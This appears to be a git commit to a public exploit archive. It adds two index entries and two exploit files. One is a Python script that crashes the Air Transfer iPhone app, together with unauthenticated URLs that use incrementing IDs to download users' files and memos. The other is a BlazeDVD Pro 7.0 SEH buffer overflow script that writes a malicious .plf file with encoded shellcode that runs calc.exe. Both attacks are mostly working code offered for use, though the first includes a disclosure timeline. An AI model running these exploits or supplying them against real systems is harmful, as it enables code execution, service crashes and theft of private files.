Updated 08_25_2014

2014-08-25 04:41:28 +00:00 · 2014-08-25 04:41:28 +00:00 · b737a287b1
commit b737a287b1
parent 414aad7eb0
3 changed files with 170 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30958,6 +30958,7 @@ id,file,description,date,author,platform,type,port
 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0
 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0
 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0
+34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 (.plf) - Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 Cross Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0
 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0
 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0
@ -30983,3 +30984,4 @@ id,file,description,date,author,platform,type,port
 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0
 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
 34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
+34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0
--- a/platforms/ios/remote/34399.txt
+++ b/platforms/ios/remote/34399.txt
@ -0,0 +1,107 @@
+# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access.
+# Date: 08/23/2014
+# Author: Samandeep Singh (SaMaN - @samanL33T )
+# Vendor Homepage:http://www.darinsoft.co.kr/sub_htmls/airtransfer_guide.html 
+				  https://itunes.apple.com/us/app/air-transfer/id521595136?mt=8
+# Category: WebApp
+# Version: 1.3.9
+# Patch/ Fix: Not available
+---------------------------------------------------
+
+Disclosure Time line
+=======================
+[Aug. 19 2014]  Vendor Contacted
+[Aug. 19 2014]  Vendor replied
+[Aug. 19 2014]  Vendor Informed about vulnerability with POC.(No reply received)
+[Aug. 21 2014]  Notified vendor about Public disclosure after 24 hours (No reply received)
+[Aug. 23 2014]  Public Disclosure.
+
+--------------------------------------------------------
+
+Product & Service Details:
+==========================
+Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.
+
+Features include:
+-----------------
+
+* The easiest way to transfer files between PC and iPhone/iPad ! 
+* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !
+
+
+
+Vulnerability details
+=========================
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1. Remote Application Crashing
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+#!/usr/bin/python
+import socket
+import sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+host=raw_input("Enter IP : ")
+port=8080
+def connect():
+    try:
+        s.connect((str(host),port))
+    except socket.error:
+        print "Error: couldn't connect"
+        sys.exit()
+    return "connected to target"
+#Crashing the App
+def crashing():
+    req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
+    try:
+        s.sendall(req)
+    except:
+        print "Error occured, Couldn't crash App"
+        sys.exit()
+    return "Application Down, Conection closed"  
+print connect()
+print crashing()
+______________________________________________________________________________________________________________________________
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+2. Broken Authentication - Memo access & File download.
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To download any file simply visit:
+
+http://<IP>:8080/?downloadSingle?id=1
+
+Just by incrementing the value of "id" we can download all the files.  
+
+TO view saved memos visit the below link:
+
+http://<IP>:8080/getText?id=0
+
+
+We can look for all the memos by incrementing the value of "id"
+
+
+
+#SaMaN(@samanL33T)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
--- a/platforms/windows/local/34371.py
+++ b/platforms/windows/local/34371.py
@ -0,0 +1,61 @@
+# BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH 
+# Date: 19.08.2014
+# Exploit Author: metacom
+# Vendor Homepage: http://www.blazevideo.com/
+# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
+# Version: 7.0.0.0
+# Tested on: Win 7 EN, Win 8.1 
+
+
+#!/usr/bin/python
+
+from struct import pack
+ 
+buffer= "\x41" * 608
+nseh="\xeb\x06\xff\xff" 
+seh=pack("<I", 0x6030F817) #6030F817  5E POP ESI Configuration.dll
+nops="\x90" * 50
+# msfpayload windows/exec CMD=calc.exe R |
+# msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
+shell=("\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" 
+"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" 
+"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" 
+"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" 
+"\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35" 
+"\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e" 
+"\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63" 
+"\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63" 
+"\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65" 
+"\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68" 
+"\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42" 
+"\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55" 
+"\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51" 
+"\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47" 
+"\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55" 
+"\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75" 
+"\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34" 
+"\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65" 
+"\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d" 
+"\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62" 
+"\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37" 
+"\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c" 
+"\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31" 
+"\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53" 
+"\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55" 
+"\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56" 
+"\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49" 
+"\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59" 
+"\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45" 
+"\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36" 
+"\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77" 
+"\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33" 
+"\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41")
+
+poc = buffer + nseh + seh + nops + shell
+try:
+  out_file = open("BlazeDVD.plf",'w')
+  out_file.write(poc)
+  out_file.close()
+  print("[*] Malicious plf file created successfully")
+except:
+  print "[!] Error creating file"